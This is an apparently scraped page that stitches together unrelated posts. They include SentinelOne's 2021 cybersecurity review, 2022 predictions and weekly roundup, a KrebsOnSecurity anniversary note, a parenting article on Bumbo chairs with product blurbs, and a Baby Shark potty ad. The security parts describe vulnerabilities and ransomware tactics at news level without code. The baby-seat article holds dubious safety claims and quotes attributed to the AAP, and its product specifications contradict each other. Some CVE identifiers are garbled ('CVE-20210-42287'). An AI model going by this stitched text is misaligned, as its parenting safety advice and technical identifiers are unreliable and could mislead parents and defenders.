The Best, The Worst and The Ugliest in Cybersecurity | 2021 Edition

As this Friday falls on New Year’s Eve, rather than taking our usual look back at the week’s Good, Bad and Ugly stories, we thought we’d take this opportunity to cast our retrospective gaze over the whole of 2021 and bring you the best, the worst, and the ugliest moments of the year.

The Best

There’s been some great moments during 2021 both for SentinelOne in particular and cybersecurity in general. SentinelOne’s IPO in June not only took the company to its next stage of evolution but was the largest cybersecurity IPO in history.

Just prior to that, our innovative, best-of-breed Singularity platform had aced MITRE Engenuity’s annual evaluations. No other vendor’s offering was able to match SentinelOne’s performance, with MITRE finding that SentinelOne was the only vendor with 100% visibility, zero missed detections and no configuration changes throughout the entire evaluation period.

Among other innovations during 2021, SentinelOne expanded its offerings to include Mobile Threat Defense, offering customers the ability to manage mobile device security alongside their user workstations, cloud workloads, and IoT devices.

Mobile Threat Defense
Bringing AI-Powered Endpoint Security To Your Mobile Devices

The year also saw the U.S. government begin a long-overdue crackdown on cybercrime, with initiatives to beef-up Federal defenses and pursue criminals attacking the U.S. while hiding abroad. Alongside Biden’s Executive Order and pledges of financial support from private enterprise, the government announced new export controls on the sale of hardware or software that could be used in cyberattacks against the U.S., as well as sanctions against a number of spyware companies.

Among a number of arrests and seizures during the year, law enforcement broke a new record for the number of cybercriminals nabbed in a single operation when Interpol announced the arrest of over 1000 cyber criminals in operation HAECHI-II.

The Worst

If there’s one thing you won’t find much disagreement about in infosec, it’s that this year has had more than its fair share of bad moments. Our weekly news roundup was dominated throughout 2021 by two main themes: severe vulnerabilities and ransomware attacks.

In June, details emerged of a remotely exploitable vulnerability in the Microsoft Windows Print Spooler service affecting all versions of Windows, appropriately dubbed PrintNightmare. Related CVEs (CVE-2021-34527 and CVE-2021-1675) that allow remote code execution were quickly folded into popular attack tools like Mimikatz and Metasploit and caused untold headaches for IT and SOC teams around the world.

That crisis-for-admins was followed by local privilege escalation HiveNightmare (CVE-2021-36934) in August. An attacker with a foothold on a system could use the flaw to extract registry hive data, including hashed passwords, which in turn could be used to further elevate privileges.

Even more lost weekends were on the cards in December when things went from bad to worse with the Log4j2 vulnerability. We will be seeing the effects of this for some time to come, as organizations struggle to understand their exposure to a vulnerability in the widely-used Java logging utility.

Resource Center | Log4j2 | Log4Shell
Stay Informed with Hunting Queries, Demos, and More

The Ugliest

Which brings us to ransomware. While there’s no doubt about the severe threat that unpatched vulnerabilities can pose to businesses, ransomware attacks can and do have life-threatening and business-ending consequences for those affected by them.

In 2021, threat actors made quick and regular work of public sector organizations that failed to protect their networks, with schools and hospitals both at home and abroad being frequent victims.

But arguably the ugliest of the year in terms of collateral damage felt beyond the domain of the immediate victim was the Colonial Pipeline attack by DarkSide ransomware. The attack in May led the states of North Carolina, Virginia, Georgia, and Florida to declare a state of emergency and to fuel prices rising to an average of $3 a gallon, with some outlets charging double that in the face of panic buying.

Even the bad guys felt the shockwaves, as underground crimeware forums began to ban discussions of ransomware for fear of retribution by the authorities.

That, alas, did little to stem the real-world threat of further ransomware attacks, and the year carried on pretty much as it started, with new threat actors, new ransomware families and, of course, new attacks.

Ebook: Understanding Ransomware in the Enterprise
This guide will help you understand, plan for, respond to and protect against this now-prevalent threat. It offers examples, recommendations and advice to ensure you stay unaffected by the constantly evolving ransomware menace.

Will 2022 see defenders get the upper hand over attackers, or will organizations yet again be up against the ropes? Our predictions for this coming year can be found here.

Our regular weekly roundup will be back next week as usual, and in the meantime, from all of us at SentinelOne, we wish you a happy and secure New Year 2022!

SentinelOne’s Cybersecurity Predictions 2022: What’s Next?

2021 was a year in which everything escalated. The pandemic triggered more separation, more isolation, and a general unease in our ability to discern the good from the bad. In cybersecurity, we saw a sharp increase in the number of threat actors riding the wave of the ransomware economy, more governments using cyber space to influence nation state politics, and definitely more software vulnerabilities. The combined effect of these has made breaches easier and security harder.

So where will 2022 lead us? Our predictions last year weren’t far off the mark, so as we look forward to another year in the trenches of cybersecurity, we gather some of SentinelOne’s best researchers and thought leaders once again to read the tea leaves of the central motifs they see coming to bear in 2022.

We Haven’t Reached ‘Peak Ransomware’ Yet

Ransomware operators have, throughout the last year, continued to display their absolute lack of compunction. Numerous high-profile attacks in 2021 demonstrated that these actors will seize any opportunity to profit. In 2022, expect the availability of highly-critical vulnerabilities such as log4j, which have exposed countless environments while greatly enhancing attackers’ toolsets, to be making the headlines more than once.

This past year also saw the wider and accelerated adoption of malware written in Rust and Go programming languages. One of the main benefits of this practice is, naturally, cross-platform compatibility. A few recent examples of this include BlackCat/AlphaVM ransomware, RansomEXX ransomware and ElectroRAT. We are trending towards a majority of these threats being multiplatform out of the gate. As we progress into 2022, expect to see a greater number of new, cross-platform malware families emerge.

Targeting of healthcare entities (hospitals, medical research facilities, private clinics) will continue to be a critical issue. While on the surface many threat operators claim to avoid attacking medical-centric targets, the reality is far less altruistic. We continue to see ransomware infecting these environments, at times costing lives. In 2022, expect to see no let up in aggressive, unscrupulous ransomware operations targeting organizations regardless of the impact on public safety.

We will also continue to see the identity of these operations blur, with various groups continuing to hide in the open while attempting to circumvent any new penalties or sanctions through frequent re-branding of their operations. Jim Walter, Senior Threat Researcher, SentinelLabs

You Can’t Spend Or Arrest Your Way Out Of Cybersecurity

We’ve seen the number of ransomware attacks rise steadily, despite enterprises spending millions. Although the US government assembling the ransomware task force was done out of good intention, it’s demonstrated that arresting the cybercriminals responsible, such as the alleged member of the REvil ransomware gang, is not going to be enough.

Recently, the U.S. State Department offered a reward of up to $10 million “for information leading to the identification or location of any individual(s) who hold(s) a key leadership position in the DarkSide ransomware variant transnational organized crime group.” While not officially linked to the Russian Federation, DarkSide was able to operate inside Russia with the apparent implicit approval of the government. The use of State Department funds underscores the desire to keep the military option in reserve while using diplomatic and other means to identify and bring to justice transnational organized crime actors.

Continued ransomware activity throughout 2022 will prove that we can’t spend or arrest our way out of cyberattacks. Instead, we must change our way of thinking. The problem isn’t the problem, it’s the way we think about the problem. And that’s not what matters. It’s how our adversaries think about the problem that really counts.

We need to think critically about the problems we are trying to solve to beat cybercriminals at their own game. Playing inside the lines isn’t going to cut it – it’s time to think outside of the box and fight machine with machine.  Morgan Wright, Chief Security Advisor, SentinelOne

Software Dependencies Are Your Weakest Link

From the end of last year with SolarWinds to the end of this year with Log4j2, the alarm bells have been ringing loud and clear: software dependencies are a massive blindspot and a major vector for supply chain attacks.

The likelihood of widely-used software components being secure out-of-the-box is low at best. Even with the best of intentions, the mindset of those that create and share useful modules, plug-ins, packages and other utility code is rarely security-focused. On top of that, the ability of an enterprise to be able to test and evaluate every piece of software that enters their network is limited for most, including the federal government.

2022 represents both an opportunity and a threat: we can tackle the problem with technology and visibility across our entire cyber estate, or we can continue as we’ve been going along, waiting for the next well-crafted nation-state attack like Sunburst or the next “universal vulnerability” like Log4j2. Overworked SOC teams and admins may vote with their feet. Migo Kedem, VP of Growth and Founder of SentinelLabs, SentinelOne

SentinelOne Singularity XDR
See how SentinelOne XDR provides end-to-end enterprise visibility, powerful analytics, and automated response across your complete technology stack.

APTs Getting Down to Business

Working in the trenches of cybersecurity research, it’s easy to get carried away with flashy and innovative operations. It’s easy to forget that ‘APT’ is a euphemism for a strata of intelligence collection operators well entrenched in the national apparatus of the majority of countries worldwide. After all, some of the more notable APTs have been around for nearly a quarter of a century.

Instead of romanticizing them as rogue outfits of wily hackers, many of these nation-state adversaries are entrenched in bureaucracies, they have objectives to meet, and–contrary to popular researcher belief–their primary goal isn’t to impress us.

This past year, nation-state adversaries learned a tried-and-true formula that being unimpressive and downright mundane (at least in the early stages of their operations) inevitably increases their return-on-investment. In other words, if your infection vector is an email ($0) with some JavaScript loaders for Cobalt Strike or Metasploit ($0), allowing you to validate victims, lookout for security solutions, begin basic collection, and deploy second-stage tools where they won’t be burned, then whatever persistence and collection you accomplish represents a booming ROI.

Moreover, it’s easier to blend into the noise of ‘business-as-usual’ when you’re just another APT doing intellectual property theft with no zero-day exploits, custom tooling, or notable antics. How many threat hunters will get out of bed to make it their business to track those folks when there are flashy high-end actors out there to blog about?

I’m afraid that 2022 will further slide us into the more mundane aspects of cyberespionage – as a pervasive but low-grade, constant but unremarkable onslaught of collection efforts from all sides that we’ve essentially grown used to. Juan Andres Guerrero-Saade, Principal Threat Researcher, SentinelLabs

Private Espionage Businesses Will Continue To Flourish

Private espionage businesses will encounter many setbacks due to their increased attention over the last year, but that will neither deter nor prevent the growth of such a lucrative and in-demand trade. We can expect researchers to uncover new and less-reported businesses selling surveillance-for-hire technology and resources around the globe with little regard for real-world impact.

While some well-known companies such as Russia’s Positive Technologies, Singapore’s Computer Security Initiative Consultancy, Israel’s Candiru, and perhaps most famously, the NSO Group, have experienced crippling government sanctions or negative media coverage during 2021, we can expect these and others to rebrand, split, or generally evolve with the opportunity of profits in mind. This type of business will not go away in 2022. Tom Hegel, Senior Threat Researcher, SentinelLabs

Why Your Operating System Isn’t Your Cybersecurity Friend

Securing the Intricacies of Enterprise Cloud Dependency

Enterprises will need to adopt cloud native security faster and respond to these threats from the front lines as customer data privacy on cloud-native servers will be put to the test. The on-going cloud-credential stealing feast will continue, and we will see cloud-native ransomware implemented by abusing weak permissions and stolen Azure and AWS API credentials.

On-Premise Active Directory will continue to fade away, while Azure Active Directory is pushed towards major adoption. As companies like Okta and JumpCloud get further buy-in, they’ll start facing increased interest from every stripe of hacker looking to gain access to large swaths of victims at once.

From the defenders perspective, API Security solutions will become a necessity. XDR adoption will grow via MSSPs forcing threat hunters to adopt more automations. These will provide coverage for the new data sources and will enable defenders to face the new battle-terms. Rafel Ivgi, Principal Security Technologist, SentinelLabs

More Targeted Attacks On Enterprise Macs (and Other Apple Devices Near You)

Unsurprisingly, and as we predicted last year, there has been a glut of macOS and iOS vulnerabilities disclosed in 2021 due to the increased scrutiny of Apple’s platforms by both security researchers and threat actors. Stealing the show during 2021 was NSO’s Pegasus zero-click iMessage exploit, in which a zero-day vulnerability (CVE-2021-30860) in Apple’s Core Graphics framework was used to construct an entire emulated computer architecture.

Meanwhile, although Macs have never been at the heart of most companies’ network or server infrastructures, the Mac has become a firm-favorite among developers and C-Suite level executives – an enticing combination for threat actors interested in high-value targets.

At the same time, iOS and macOS security is woefully misunderstood by Apple users, including in the enterprise. While Mac users at least have the ability to install 3rd-party EDR products for detection and protection against malware, few choose to do so, persuaded by a strong “Macs are safe by design” marketing message from Apple. Lulled into believing that the Mac’s legacy AV scanner XProtect and the regularly-bypassed Gatekeeper and Notarization technologies are somehow enough, users leave themselves and their organizations vulnerable to attacks. The fact is, the Mac’s built-in defenses are far from adequate, as even Apple admitted earlier this year.

Recent history has shown that threat actors with the most resources – nation-states – are willing to spend those resources on targeting dissidents, journalists and political opponents. Whether it’s buying NSO spyware like Pegasus or creating Mac-specific backdoors like macOS.Macma, governments (or their proxies) have been the main driver of targeted attacks against Apple’s platforms so far. However, where nation-states go, criminals soon follow.

These three factors – increased attention on Apple device vulnerabilities, wider use of Macs in the enterprise, and the false sense of security that Macs are safe and don’t need 3rd-party protection – will lead to more high-value, targeted attacks against Apple device users in 2022.  Phil Stokes, macOS Threat Researcher, SentinelLabs

The Complete Guide to Understanding Apple Mac Security for Enterprise
Learn how to secure macOS devices in the enterprise with this in-depth review of the strengths and weaknesses of Apple’s security technologies.

Conclusion

While this year saw the U.S. government making some valiant efforts to try and tackle the long-standing challenges of cybersecurity, it is enterprises that are the first and last line of defense, needing to stay focused on growth and commercial expansion while not risking it all by getting breached and losing trust and material funds.

Whatever challenges 2022 brings, we all need to ensure that we are taking care of the basics: strong preventative measures, clear Incident Response and Disaster Recovery planning, and let’s not forget to take care of our people on the front line! From all of us at SentinelOne, we wish you a happy and secure New Year!

If you would like to learn how SentinelOne can protect your organization, contact us or request a free demo.

Happy 12th Birthday, KrebsOnSecurity.com!


KrebsOnSecurity.com celebrates its 12th anniversary today! Maybe “celebrate” is too indelicate a word for a year wracked by the global pandemics of COVID-19 and ransomware. Especially since stories about both have helped to grow the audience here tremendously in 2021. But this site’s birthday also is a welcome opportunity to thank you all for your continued readership and support, which helps keep the content here free to everyone.

More than seven million unique visitors came to KrebsOnSecurity.com in 2021, generating some 12 million+ pageviews and leaving almost 8,000 comments. We also now have nearly 50,000 subscribers to our email newsletter, which is still just a text-based (non-HTML) email that goes out each time a new story is published here (~2-3 times a week).

Back when this site first began 12 years ago, I never imagined it would attract such a level of engagement. Before launching KrebsOnSecurity, I was a tech reporter for washingtonpost.com. For many years, The Post’s website was physically, financially and editorially separate from what the dot-com employees affectionately called “The Dead Tree Edition.” When the two newsrooms finally merged in 2009, my position was eliminated.

Happily, the blog I authored for four years at washingtonpost.com — Security Fix — had attracted a sizable readership, and it seemed clear that the worldwide appetite for in-depth news about computer security and cybercrime would become practically insatiable in the coming years.

Happier still, The Post offered a severance package equal to six months of my salary. Had they not thrown that lifeline, I doubt I’d have had the guts to go it alone. But at the time, my wife basically said I had six months to make this “blog thing” work, or else find a “real job.”

God bless her eternal patience with my adopted occupation, because KrebsOnSecurity has helped me avoid finding a real job for a dozen years now. And hopefully they let me keep doing this, because at this point I’m certainly unqualified to do much else.

I’d be remiss if I didn’t take this opportunity to remind Dear Readers that advertisers do help keep the content free here to everyone. For security and privacy reasons, KrebsOnSecurity does not host any third-party content on this site — and this includes the ad creatives, which are simply images or GIFs vetted by Yours Truly and served directly from krebsonsecurity.com.

That’s a long-winded way of asking: If you regularly visit KrebsOnSecurity.com with an ad blocker, please consider adding an exception for this site.

Thanks again, Dear Readers. Please stay safe, healthy and alert in 2022. See you on the other side!

12 Months of Fighting Cybercrime & Defending Enterprises | SentinelLabs 2021 Review

It’s been a busy year for the SentinelLabs research team, with 45 posts published throughout 2021 on crimeware, APT actors, software vulnerabilities, and macOS malware, not to mention releasing a few community tools for reverse engineering and threat hunting.

Ransomware and APT actors have dominated much of our year, along with some spectacular vulnerabilities that have impacted enterprises worldwide. We’ve seen novel attacks targeting macOS and threat actors setting their sights on Docker containers and cloud workloads.

As ever, you can find all our research and threat intelligence posts over at SentinelLabs, but for a quick recap on some of the main highlights, take a scroll through our 2021 timeline below.

January

In early January, we broke news of macOS.OSAMiner, a long-running cryptominer campaign targeting macOS users. What made this particular campaign so effective at staying undetected for at least five years was its use of run-only AppleScripts. SentinelLabs’ research showed how researchers can reverse these opaque executables and revealed previously hidden IoCs.

FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts

February

Zeoticus ransomware was causing trouble prior to 2021 but had received little attention from researchers. Unusually, Zeoticus executes fully even if the device is air-gapped or fails to have internet connectivity. SentinelLabs detailed how this Windows-specific malware had evolved, and described its execution and persistence methods.

Zeoticus 2.0 | Ransomware With No C2 Required

In February, SentinelLabs also revealed a privilege escalation vulnerability in Microsoft’s flagship security product, Windows Defender. The bug, CVE-2021-24092, had remained unreported for 12 years and likely affected around a billion devices.

March

More macOS malware came to light in March in the form of SentinelLabs’ discovery of XcodeSpy, a targeted attack on iOS software developers using Apple’s Xcode IDE. A malicious Xcode project was found to be installing a customized backdoor with the ability to record the victim’s microphone, camera and keyboard.

New macOS Malware XcodeSpy Targets Xcode Developers with EggShell Backdoor

April

While Windows vulnerabilities are a fairly common occurrence, SentinelLabs’ report of a new NTLM relay attack was, surprisingly, classed as a “Won’t Fix” by Microsoft in April. The vulnerability affects every Windows system and could allow attackers to escalate privileges from user to domain admin.

Relaying Potatoes: Another Unexpected Privilege Escalation Vulnerability in Windows RPC Protocol

On the crimeware front, this month SentinelLabs also published an update on Avaddon RaaS and detailed APT activity relating to Zebrocy.

May

As we kicked into the summer months, adversary activity also started to ramp up beginning with Agrius, a new threat actor SentinelLabs observed operating against targets in Israel. Agrius actors dropped a novel wiper named ‘Apostle’, which later evolved into a fully functional ransomware.

From Wiper to Ransomware | The Evolution of Agrius

Also in May, SentinelLabs researchers disclosed CVE-2021-21551, a single CVE to track multiple BIOS driver privilege escalation flaws impacting hundreds of millions of Dell computers.

June

Building off earlier research around APT actor Nobelium (aka APT29, The Dukes), SentinelLabs discovered that the same threat actor (tracked by SentinelLabs as ‘NobleBaron’) was engaged in supply-chain attack activity via a poisoned update installer for electronic keys used by the Ukrainian government.

NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks

Also this month, SentinelLabs presented evidence that an attack on Russia’s FSB that had been widely-attributed to Western “Five Eyes” agencies was far more likely to have been of Chinese origin, probably from threat actor TA428.

July

Cyberwar took an unusual turn in July when Iran’s train system was paralyzed by an attack from a mysterious wiper. The attackers taunted the Iranian government as hacked displays instructed passengers to direct their complaints to the phone number of the Iranian Supreme Leader Khamenei’s office. SentinelLabs researchers were able to reconstruct the majority of the attack chain and sketch the outline of a new adversary.

MeteorExpress | Mysterious Wiper Paralyzes Iranian Trains with Epic Troll

This month also saw the Labs team disclose CVE-2021-3438 – a high severity flaw in HP, Samsung, and Xerox printer drivers – and offer an in-depth analysis of Conti ransomware.

August

ShadowPad is a privately sold modular malware platform and used in infamous campaigns such as CCleaner, NetSaran and the ASUS supply-chain attacks. SentinelLabs researchers produced a ground-breaking report on the origin, use and ecosystem of ShadowPad.

ShadowPad | A Masterpiece of Privately Sold Malware in Chinese Espionage

One of the busiest months of the year for our researchers, August also saw us dislose a massive macOS adware campaign undetected by Apple, a ransomware campaign targeting healthcare providers, and HotCobalt – a denial-of-service vulnerability affecting Cobalt Strike.

September

In another in-depth investigation into cyberespionage and APT activity, SentinelLabs broke the story of a Turkish-nexus threat actor that targeted journalists to place malware and incriminating documents on their devices immediately prior to their arrest.

EGoManiac | An Unscrupulous Turkish-Nexus Threat Actor

We also reported on new variants of both Apostle ransomware and the Zloader banking trojan, as well as disclosing CVE-2021-3437.

October

Both Karma ransomware and Spook ransomware were new players in 2021’s ransomware ecosystem. Karma has targeted numerous enterprises across different industries this year. SentinelLabs explored the links between Karma and other well known malware families such as NEMTY and JSWorm.

Karma Ransomware | An Emerging Threat With A Hint of Nemty Pedigree

Meanwhile, SentinelLab’s investigation into Spook ransomware found that the operator published details of all victims regardless of whether they paid or not.

November

APTs targeting macOS are a far rarer sight than on Windows, but this November saw news break of a targeted attack against pro-democracy activists in Hong Kong with a novel macOS malware dubbed “Macma”. SentinelLabs dove in and revealed further IoCs not previously reported to aid defenders and threat hunters.

Infect If Needed | A Deeper Dive Into Targeted Backdoor macOS.Macma

SentinelLabs also disclosed multiple separate vulnerabilities this month: CVE-2021-43267 – a remote Linux kernel heap overflow – and the related VirtualBox vulnerabilities CVE-2021-2145, CVE-2021-2310, and CVE-2021-2442.

December

Unsurprisingly, we rounded out the year with yet another novel ransomware threat. While most actors in this space have adopted the double-extortion method – demand a ransom for encrypted files, then threaten to leak the data if the victim doesn’t pay up – the operators behind Rook were particularly candid about their motivations, stating “We desperately need a lot of money”. SentinelLabs researchers offered the first technical write up of Rook, covering both high-level features and its ties to Babuk ransomware.

New Rook Ransomware Feeds Off the Code of Babuk

We also discovered and disclosed multiple vulnerabilities in AWS and other major cloud services that implement USB over Ethernet.

Conclusion

2021 was some year for everyone involved in fighting cybercrime and defending enterprises. From APTs and bugs to malware and ransomware, we’ve all had plenty to do to keep up with the unfolding cybersecurity threats this year. SentinelLabs continues in its commitment to keep you up to date with the latest research and threat intelligence.

We’ll be back shortly after the New Year. In the meantime, we wish everyone a happy and secure New Year and 2022. Be sure to keep your organization, endpoints, network and cloud infrastructure safe with SentinelOne’s award-winning Singularity platform, and keep your security team up-to-date with SentinelLabs’ original and timely research.

At What Age Can Babies Use A Bumbo Chair?

The Bumbo chair can be used from around 4 months old (when your baby has good head control and can sit unassisted) until they can climb out of it (usually about 12 months old). It should not be an alternative to an infant seat or bouncer. The chair helps support your baby in a seated position, which can help with their development.

However, it is essential to remember that the age recommendation is just a recommendation. There is no definitive answer as different babies will reach the developmental milestones necessary to use a bumbo chair at different ages. However, most babies can use a bumbo chair safely by around 4 months old.

Remember that it is always important to consult with your pediatrician before giving your baby any new type of seat.

Can older babies use bumbo chairs? (8 months and up)

Yes, if your child is over eight months and meets the guidelines above, they can still use a bumbo chair. Many parents report that their children enjoy using the bumbo well into the second year.

What is a Bumbo chair?

A Bumbo chair, also known as a bumbo seat, is a molded plastic chair with a round, flat bottom. There is a three-point harness to secure the baby, and the child has no control over the direction they are facing. The Bumbo chair can be used on any flat surface. The manufacturer also makes other products designed for use with the bumbo, such as playpens, activity gyms, bath seats, and stools.

However, there are concerns that a baby seated in a bumbo is not visible to those around them, which has led to several cases of accidental suffocation.

The American Academy of Pediatrics (AAP) recommends against using the bumbo as it “poses a risk for serious head injuries and ejection from the chair” as well as other problems such as aspiration. The AAP has also stated that the bumbo chair “should not be used for routine feeding.”

How to use a bumbo chair safely

Despite the risks associated with using the bumbo chair, many parents find it helpful in supporting their baby in a seated position. If you do choose to use a bumbo chair, there are steps parents can take to use the bumbo chair safely.

  • First, be sure that your baby can sit up unassisted before placing them in the bumbo seat.
  • The bumbo should not be used on an elevated surface.
  • Always use the harness at all times when seated in the bumbo.
  • The bumbo should not be used for longer than 30 minutes at a time.

If you are concerned about your baby’s safety, remember that it is essential to contact your pediatrician. It is also helpful to talk with other parents who have used the chair before, as they may offer additional advice based on their personal experiences.

Bumbo chair alternatives

If you are not comfortable using a bumbo chair, other options are available to help your baby sit up. You can try an infant seat or bouncer, which will provide more support for your baby.

Fisher-Price Sit-Me-Up Floor Seat

This Fisher-Price floor seat is an excellent alternative to the Bumbo chair. Invite your child to sit up and play in a comfortable, sturdy seat that provides them with a view of the world around them! The two linked toys, a turtle spinner with a mirrored side and entertaining clackers keep your cuddle bug occupied. And the comfy seat cushion is detachable and machine-washable, making cleanup simple!

The Sit-Me-Up Floor Seat’s supportive upright seat and broad, stable base allow your child to observe and interact with the world around him, providing comfort and security.

The lightweight and ultra-compact design of this foldable baby chair make it a breeze to transport your loved one along with you to grandma’s house or wherever you’re going.

It can be used for babies up to 25 pounds or until they can sit up on their own without assistance.

Summer Learn-to-Sit Stages 3-Position Floor Seat

This Summer 3-position floor seat is a great alternative to the Bumbo chair. It is designed to help your baby learn to sit up on their own, and it can be used for babies up to 40 pounds. The Summer Learn-to-Sit Stages 3-Position Floor Seat has three different height levels, so it can grow with your child as they gain new skills.

  1. The first position is lower to the ground and is intended for babies with complete neck control.
  2. When your baby learns to sit up, transition them to the second posture, which will assist in developing balance.
  3. The highest position is for babies who begin to sit up.

The Learn-to-Sit Stages 3-position floor seat features detachable toys and a meal tray to provide everything you need. This chair also folds completely flat for storage and travel, making it ideal.

This baby chair is extra-safe and easy to use. It supports up to 25 pounds so that you can use it for a long time! It also comes with a comfortable cushion that makes this perfect for playtime, nap time, or anytime.

The ergonomic design of this sturdy baby floor seat distributes your child’s weight evenly, making it more comfortable for them to sit up. And the broad base prevents your little one from tipping over.

Fisher-Price Healthy Care Deluxe Booster Seat

This Fisher-Price healthy care booster seat is perfect for when your baby begins to sit up on their own all the way to toddlerhood. The Healthy Care Booster Seat supports babies up to 50 pounds and helps them develop the skills they need to transition to a regular chair.

It has a three-point harness for safety and a removable tray with two cup holders, and a snap-on lid that doubles as a serving tray. The Booster Seat folds up for easy storage and transport, and it wipes clean easily.

The easy cleaning is what makes this kids’ chair special. There are no nooks or crannies to retain crumbs, so you can keep your baby’s space clean. The feeding tray can be cleaned in the dishwasher to reduce germs.

This Fisher-Price kids’ chair is durable enough to last through long family gatherings. It has an extended use up to six years so that it can grow with your child. The lightweight design makes it easy to move from one place to another.

Infantino 3-in-1 Booster Seat

This Infantino 3-in-1 booster seat is perfect for your growing child. It can be used in 3 different ways:

  • as a seated positioner
  • as a feeding booster
  • as a table booster seat

The Infantino 3-in-1 Booster Seat is designed to support babies up to 33 pounds so that it can be used for a long time.

The Infantino Grow-With-Me Discovery Seat and Booster is a three-in-one product that provides an interactive play area, snack time seat, and secure booster with harnesses.

Babies seat and play with toys: spinners, mirror play, and silly squeakers, encouraging sensory development. When it’s time for a snack, just remove the detachable toy pods to reveal a snack tray with a cup holder. Use the security straps to attach the booster seat to a kitchen chair as your baby grows.

Skip Hop 2-in-1 Sit-up Activity Baby Chair

This Skip Hop 2-in-1 Sit-up Activity Baby Chair is perfect for when your baby begins to sit up on their own. The Skip Hop 2-in-1 Sit-up Activity Baby Chair has a soft, comfortable seat with an adjustable harness to keep your child safe. It also comes with a removable tray with a built-in cup holder and an activity center with various activities to keep your baby entertained.

The 2-in-1 design makes this baby chair super convenient. Parents can alternate between a multipurpose tray (perfect for snacks!) and three interesting toys, depending on whether it is time for a meal or play.

The sturdy, wide-leg foundation provides stability, while the soft fabric seat cover makes Skip Hop chair comfy. The seat cover may be removed for simple machine washing.

Ingenuity Baby Base 2-in-1 Booster Feeding and Floor Seat with Self-Storing Tray

This product shows how to transform a playtime chair into a snack time quickly!

The Baby Base securely clamps onto dining chairs, allowing your child to sit higher and see more during family dinners. Cute in design, this tiny baby feeding chair is lightweight and portable. It’s a fantastic option for at-home or on-the-go dining with your child!

The detachable tray allows your youngster to have their own perfectly sized table, so they can easily reach food or toys. The tray conveniently folds up underneath the booster seat when it is not used. The tray is also dishwasher safe, making mealtimes a pleasure. Wipe the base and foam insert clean with a damp cloth and mild soap to remove dust.

The Baby Base may be used once your baby can hold its head up independently. The safety strap secures a tight fasten when linked to your dining chair, and the 3-point harness keeps the baby safe.

Remove the foam seat insert when your baby gets older and use it as a toddler seat. Suitable for 6 months to 36 months.

Upseat Baby Chair Booster Seat with Tray

Upseat Baby Chair Booster Seat was designed by physical therapists with developing babies in mind and targets the muscles responsible for good upright posture while also being safe for a child’s developing hips.

Upseat baby seats allow for chubby legs and keep babies’ hips in a safe and correct posture. This chair is recommended for kids who can sit on their own, mainly from the 3rd month of life until 12 months. Upseat Baby Chair Booster Seat holds up to 30 pounds.

This baby chair can be used in 3 ways:

  • as a floor seat
  • as a booster seat
  • as a feeding chair

Upseat baby chair booster seat comes with a detachable tray designed, so it is super easy to clean up after mealtime.

The post At What Age Can Babies Use A Bumbo Chair? appeared first on Comfy Bummy.

The Good, the Bad and the Ugly in Cybersecurity – Week 52

The Good

We have a few nifty victories for law enforcement this week. First off, an individual that heralds from Massachusetts, Flavio Candido da Silva, recently pled guilty to aggravated identity theft and conspiracy to commit wire fraud in a Boston federal court. Da Silva is alleged to be part of a larger team responsible for the theft of identities and the manufacture and distribution of falsified documents. The case relates to charges laid back in May when nineteen individuals were charged with conspiracy to open fraudulent driver accounts at multiple rideshare and delivery companies.

In some cases, identifying information used to feed fake accounts was obtained directly from victims through social engineering. The actors would gain access to victims’ identification documents by posting as an alcohol delivery service or deliberately causing minor vehicle accidents. The fraudulent accounts were used to further spoof income documents for these newly-created fake workers. There is potentially a lengthy jail term tied to this one, which hopefully will serve as a deterrent to those thinking of engaging in cybercrime.

The week would not be complete without mention of Log4j. There have been some important updates around this threat from the wider community, including CISA’s Mitigating Log4Shell and Other Log4j-Related Vulnerabilities, which was updated on December 22nd. Their advisory serves as a launching point for various other Joint Cybersecurity and JCDC advisories. As always, the latest bleeding edge updates will be posted on the SentinelOne blog.

The Bad

On top of the extra workload IT admins have been dealing with thanks to the ongoing log4j2 vulnerability, this week’s bad news is particularly unwelcome as it involves another “patch the thing we already patched” scenario from Microsoft. This week’s new fire hazard comes courtesy of two Active Directory domain controller bugs. The bugs were addressed last month, but it turns out they can still be exploited by attackers and allow the take over of Windows Domain Controllers.


The two flaws, which have a severity rating of 7.5, are tracked as CVE-2021-42278 and CVE-20210-42287. The new advisory comes in the wake of a publicly available exploit being published back on December 12th.

SAM Name impersonation (CVE-2021-42278) allows attackers to tamper with the SAM-Account-Name attribute used to log users into a system in the AD domain. Meanwhile, KDC Bamboozling (CVE-20210-42287) allows a potential attacker to impersonate a domain controller directly. According to Microsoft:

“Combining the two CVEs, an attacker with domain user credentials can leverage them for granting access as a domain admin user in a few simple steps.”

OK folks, you know the drill. Patch the patch, and ensure you have reliable endpoint protection in place.

The Ugly

As if things aren’t bad enough on the ransomware scene, it gets even uglier when actors find new ways to bypass or disable certain security tools. In that context, we shine a light on AvosLocker, which emerged in June 2021 as a new RaaS (Ransomware as a Service) operator.

In an effort to improve the success rate of encryption, AvosLocker decided to do what any good IT admin would do when encountering a problem on a device: boot it in Safe Mode!

According to researchers, in some cases AvosLocker was forcing victim machines to reboot in Safe Mode with networking, and installing the remote management tool AnyDesk. This allows the attackers to control the target machines remotely while security tools that don’t run in Safe Mode are inactive.

The attackers were also seen running a tool called PDQ Deploy to push customized batch scripts out to target devices to assist in disabling a number of endpoint security solutions before rebooting into Safe Mode. Once booted, the victim machines run the ransomware payload and files are encrypted.

Endpoint security tools affected by the technique, the researchers say, include:

  • Windows Defender
  • Carbon Black
  • Bitdefender
  • Trend Micro
  • Kaspersky
  • Symantec
  • Cylance

AvosLocker does not succeed on devices protected by SentinelOne.

This serves as a good reminder that all these ransomware actors are constantly at work, even when not being highlighted in the news. For additional information on ransomware and potential solutions, start here.

Baby Shark Potty – The Secret To Successful Potty Training

There are many ways to toilet train your child. Some might say that modern technology has made this task easier for parents today than ever before, while others may argue it has only complicated the process even further. There is no denying, though, that potty training is a serious challenge for children and parents alike, regardless of how far technology has come to change it.

However, one of the best methods for potty training is also a really old-fashioned technique: The Potty Dance. It’s usually considered comical and silly, but you can actually use this dance to your advantage when toilet training a child. What happens if you connect The Potty Dance with Baby Shark?

Baby Shark Potty

If you’re looking for a potty training method that is fun and will keep your child engaged, then the Baby Shark Potty may be just what you need! This unique potty training tool is based on the popular children’s song, “Baby Shark.”

The Baby Shark Potty is an award-winning potty training seat that uses the familiar “Baby Shark” song to encourage your child to use the potty. Children exposed to this unique method become excited about using their baby shark potty seat. They enjoy hearing music play while using the bathroom, and parents find success in their potty training efforts.

Baby Shark Potty – Features

  • comfortable
  • fun design
  • realistic flushing and cheering sounds
  • easy to use
  • easy to clean lift-out pot
  • reward card and stickers included

